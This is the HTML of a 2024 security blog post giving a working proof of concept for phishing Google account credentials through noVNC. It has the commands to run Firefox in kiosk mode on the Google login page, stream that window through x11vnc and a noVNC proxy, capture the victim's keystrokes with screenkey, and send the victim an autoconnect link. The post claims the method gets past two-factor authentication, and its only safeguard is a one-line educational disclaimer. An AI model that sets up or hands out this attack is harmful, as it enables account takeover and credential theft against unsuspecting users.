<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title> Phishing Attacks with VNC | Moshe Z </title> <meta name="author" content="Moshe Z"> <meta name="description" content="Exploring the Sophisticated Potential of VNC for Phishing Attacks"> <meta name="keywords" content="cyber-security, dark-net, osint, tutorials, coding"> <meta property="og:site_name" content="Moshe Z"> <meta property="og:type" content="article"> <meta property="og:title" content="Moshe Z | Phishing Attacks with VNC"> <meta property="og:url" content="https://moshezaudi.github.io/blog/2024/phishing-attacks-with-vnc/"> <meta property="og:description" content="Exploring the Sophisticated Potential of VNC for Phishing Attacks"> <meta property="og:locale" content="en"> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="Phishing Attacks with VNC"> <meta name="twitter:description" content="Exploring the Sophisticated Potential of VNC for Phishing Attacks"> <script type="application/ld+json">
    {
        "author":
        {
            "@type": "Person",
            "name": "Moshe Z"
        },
        "url": "https://moshezaudi.github.io/blog/2024/phishing-attacks-with-vnc/",
        "@type": "BlogPosting",
        "description": "Exploring the Sophisticated Potential of VNC for Phishing Attacks",
        "headline": "Phishing Attacks with VNC",
        
        "sameAs": ["https://scholar.google.com/citations?user=qc6CJjYAAAAJ"],
        
        "name": "Moshe Z",
        "@context": "https://schema.org"
    }
  </script> <link rel="stylesheet" href="/assets/css/bootstrap.min.css?a4b3f509e79c54a512b890d73235ef04"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/css/mdb.min.css" integrity="sha256-jpjYvU3G3N6nrrBwXJoVEYI/0zw8htfFnhT9ljN3JJw=" crossorigin="anonymous"> <link defer rel="stylesheet" href="/assets/css/academicons.min.css?f0b7046b84e425c55f3463ac249818f5"> <link defer rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Roboto+Slab:100,300,400,500,700|Material+Icons&amp;display=swap"> <link defer rel="stylesheet" href="/assets/css/jekyll-pygments-themes-github.css?591dab5a4e56573bf4ef7fd332894c99" media="" id="highlight_theme_light"> <link rel="shortcut icon" href="data:image/svg+xml,&lt;svg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20100%20100%22&gt;&lt;text%20y=%22.9em%22%20font-size=%2290%22&gt;%F0%9F%92%BB&lt;/text&gt;&lt;/svg&gt;"> <link rel="stylesheet" href="/assets/css/main.css?d41d8cd98f00b204e9800998ecf8427e"> <link rel="canonical" href="https://moshezaudi.github.io/blog/2024/phishing-attacks-with-vnc/"> <link defer rel="stylesheet" href="/assets/css/jekyll-pygments-themes-native.css?5847e5ed4a4568527aa6cfab446049ca" media="none" id="highlight_theme_dark"> <script src="/assets/js/theme.js?0afe9f0ae161375728f7bcc5eb5b4ab4"></script> <script defer src="https://cdn.jsdelivr.net/npm/medium-zoom@1.1.0/dist/medium-zoom.min.js" integrity="sha256-ZgMyDAIYDYGxbcpJcfUnYwNevG/xi9OHKaR/8GK+jWc=" crossorigin="anonymous"></script> <script defer src="/assets/js/zoom.js?85ddb88934d28b74e78031fd54cf8308"></script> <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script> <script type="text/javascript">window.MathJax={tex:{tags:"ams"}};</script> <script defer type="text/javascript" id="MathJax-script" src="https://cdn.jsdelivr.net/npm/mathjax@3.2.0/es5/tex-mml-chtml.js"></script> <script defer src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?features=es6"></script> <script src="/assets/js/distillpub/template.v2.js"></script> <script src="/assets/js/distillpub/transforms.v2.js"></script> <script src="/assets/js/distillpub/overrides.js"></script> </head> <body> <d-front-matter> <script async type="text/json">
      {
            "title": "Phishing Attacks with VNC",
            "description": "Exploring the Sophisticated Potential of VNC for Phishing Attacks",
            "published": "May 04, 2024",
            "authors": [
              
            ],
            "katex": {
              "delimiters": [
                {
                  "left": "$",
                  "right": "$",
                  "display": false
                },
                {
                  "left": "$$",
                  "right": "$$",
                  "display": true
                }
              ]
            }
          }
    </script> </d-front-matter> <header> <nav id="navbar" class="navbar navbar-light navbar-expand-sm fixed-top" role="navigation"> <div class="container"> <a class="navbar-brand title font-weight-lighter" href="/"> Moshe Z </a> <button class="navbar-toggler collapsed ml-auto" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar top-bar"></span> <span class="icon-bar middle-bar"></span> <span class="icon-bar bottom-bar"></span> </button> <div class="collapse navbar-collapse text-right" id="navbarNav"> <ul class="navbar-nav ml-auto flex-nowrap"> <li class="nav-item "> <a class="nav-link" href="/"> </a> </li> <li class="nav-item "> <a class="nav-link" href="/index.html">Cyber Craft Blog </a> </li> <li class="toggle-container"> <button id="light-toggle" title="Change theme"> <i class="fa-solid fa-moon"></i> <i class="fa-solid fa-sun"></i> </button> </li> </ul> </div> </div> </nav> <progress id="progress" value="0"> <div class="progress-container"> <span class="progress-bar"></span> </div> </progress> </header> <div class="post distill"> <d-title> <h1>Phishing Attacks with VNC</h1> <p>Exploring the Sophisticated Potential of VNC for Phishing Attacks</p> </d-title> <d-article> <d-contents> <nav class="l-text figcaption"> <h3>Contents</h3> <div> <a href="#introduction">Introduction</a> </div> <div> <a href="#important-disclaimer">Important Disclaimer</a> </div> <div> <a href="#security-context">Security Context</a> </div> <div> <a href="#poc">PoC</a> </div> <div> <a href="#credits">Credits</a> </div> </nav> </d-contents> <h3 id="introduction">Introduction</h3> <p>On February 19, 2022, <a href="https://twitter.com/mrd0x" rel="external nofollow noopener" target="_blank">Mr. d0x</a> a cybersecurity researcher introduced a method that uses VNC for phishing attacks. I was impressed by the cleverness of this idea.</p> <h3 id="background">Background</h3> <p>VNC, or Virtual Network Computing, is a way to share screens and control another computer remotely. It works by installing a VNC server on the computer you want to control, and a VNC viewer on the device you’re using to control it.</p> <p>Using VNC in a phishing attack is straightforward. We set up a VNC server, share our screen, specifically our browser window, and trick the victim into believing they are controlling their own browser while they are actually connected to our browser, allowing us to intercept any data that passes.</p> <p>Using a library called <a href="https://novnc.com/" rel="external nofollow noopener" target="_blank">noVNC</a>, we can establish connections to VNC servers through modern web browsers.</p> <p>This phishing technique has several benefits over traditional phishing methods:</p> <ul> <li>We can record all keystrokes made by the victim</li> <li>We can watch in real-time what the victim is doing on a website</li> <li>Regular Two-factor authentication will not protect against this type of attack</li> </ul> <hr> <h3 id="important-disclaimer">Important Disclaimer</h3> <p>The information provided is for educational purposes only. I do not take responsibility for any actions taken based on the information provided.</p> <h3 id="security-context">Security Context</h3> <p>Please note that the PoC demonstrated in this guide is not safe for “production” use, as it lacking essential security configurations.</p> <hr> <h3 id="prerequisites">Prerequisites</h3> <ul> <li>Linux machine that is fully updated</li> </ul> <hr> <h3 id="poc">PoC</h3> <p>First, we launch Firefox or any other browser in kiosk mode with the website we want to phish. For this example, we will use Google accounts.</p> <p>Kiosk mode is a feature that can restrict user activities and interactions outside the intended scope of operation, this is necessary to prevent the victim from controlling other areas of our attacking machine, which may lead to unwanted access or control.</p> <p>In the terminal, execute:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>firefox <span class="nt">--kisok</span> https://accounts.google.com
</code></pre></div></div> <p>Now, in a new terminal window, we will run a noVNC server:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/novnc/noVNC
<span class="nb">cd </span>noVNC
./utils/novnc_proxy <span class="nt">--listen</span> 0.0.0.0:8080 <span class="nt">--vnc</span> localhost:5900
</code></pre></div></div> <figure> <picture> <source class="responsive-img-srcset" srcset="/assets/img/posts/2/2-480.webp 480w,/assets/img/posts/2/2-800.webp 800w,/assets/img/posts/2/2-1400.webp 1400w," sizes="95vw" type="image/webp"></source> <img src="/assets/img/posts/2/2.png" class="img-fluid rounded z-depth-1" width="100%" height="auto" data-zoomable="" loading="eager" onerror="this.onerror=null; $('.responsive-img-srcset').remove();"> </picture> </figure> <p>Now, we need to obtain the ID of the running Firefox process:</p> <ol> <li>Run <code class="language-plaintext highlighter-rouge">xwininfo | grep id</code> in the terminal</li> <li>Click on the Firefox window.</li> <li>In the terminal, the window ID will be displayed.</li> </ol> <figure> <picture> <source class="responsive-img-srcset" srcset="/assets/img/posts/2/3-480.webp 480w,/assets/img/posts/2/3-800.webp 800w,/assets/img/posts/2/3-1400.webp 1400w," sizes="95vw" type="image/webp"></source> <img src="/assets/img/posts/2/3.png" class="img-fluid rounded z-depth-1" width="100%" height="auto" data-zoomable="" loading="eager" onerror="this.onerror=null; $('.responsive-img-srcset').remove();"> </picture> </figure> <p>Once we have obtained the window ID of Firefox using <code class="language-plaintext highlighter-rouge">xwininfo</code>, we can start a local VNC server by running:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt <span class="nb">install </span>x11vnc
x11vnc <span class="nt">-id</span> &lt;window_id&gt;
</code></pre></div></div> <p>Once we have started the local VNC server, we can use the <code class="language-plaintext highlighter-rouge">screenkey</code> tool to view key presses by the victim in real time. It is important to note that <code class="language-plaintext highlighter-rouge">screenkey</code> will display our own key presses as well.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt <span class="nb">install </span>screenkey
screenkey
</code></pre></div></div> <h3 id="victim">Victim</h3> <p>Fantastic! Our phishing setup is all set and can now be accessed through the following URL: <code class="language-plaintext highlighter-rouge">http://&lt;ip&gt;:8080/vnc.html?autoconnect=true</code></p> <p>As soon as a victim visits this URL, they will see what looks like the Google accounts login page. Little do they know, it’s actually a live streaming video that they can interact with. It’s a pretty sneaky and clever trick.</p> <figure> <picture> <source class="responsive-img-srcset" srcset="/assets/img/posts/2/4-480.webp 480w,/assets/img/posts/2/4-800.webp 800w,/assets/img/posts/2/4-1400.webp 1400w," sizes="95vw" type="image/webp"></source> <img src="/assets/img/posts/2/4.png" class="img-fluid rounded z-depth-1" width="100%" height="auto" data-zoomable="" loading="eager" onerror="this.onerror=null; $('.responsive-img-srcset').remove();"> </picture> </figure> <h3 id="credits">Credits</h3> <p><a href="https://mrd0x.com/bypass-2fa-using-novnc/" rel="external nofollow noopener" target="_blank">Steal Credentials &amp; Bypass 2FA Using noVNC</a> (mr.d0x, 2020)</p> </d-article> <d-appendix> <d-footnote-list></d-footnote-list> <d-citation-list></d-citation-list> </d-appendix> <d-bibliography src="/assets/bibliography/"></d-bibliography> </div> <footer class="sticky-bottom mt-5" role="contentinfo"> <div class="container"> © Copyright 2024 Moshe Z. </div> </footer> <script src="/assets/js/bootstrap.bundle.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/js/mdb.min.js" integrity="sha256-NdbiivsvWt7VYCt6hYNT3h/th9vSTL4EDWeGs5SN3DA=" crossorigin="anonymous"></script> <script type="text/javascript">function progressBarSetup(){"max"in document.createElement("progress")?(initializeProgressElement(),$(document).on("scroll",function(){progressBar.attr({value:getCurrentScrollPosition()})}),$(window).on("resize",initializeProgressElement)):(resizeProgressBar(),$(document).on("scroll",resizeProgressBar),$(window).on("resize",resizeProgressBar))}function getCurrentScrollPosition(){return $(window).scrollTop()}function initializeProgressElement(){let e=$("#navbar").outerHeight(!0);$("body").css({"padding-top":e}),$("progress-container").css({"padding-top":e}),progressBar.css({top:e}),progressBar.attr({max:getDistanceToScroll(),value:getCurrentScrollPosition()})}function getDistanceToScroll(){return $(document).height()-$(window).height()}function resizeProgressBar(){progressBar.css({width:getWidthPercentage()+"%"})}function getWidthPercentage(){return getCurrentScrollPosition()/getDistanceToScroll()*100}const progressBar=$("#progress");window.onload=function(){setTimeout(progressBarSetup,50)};</script> </body> </html>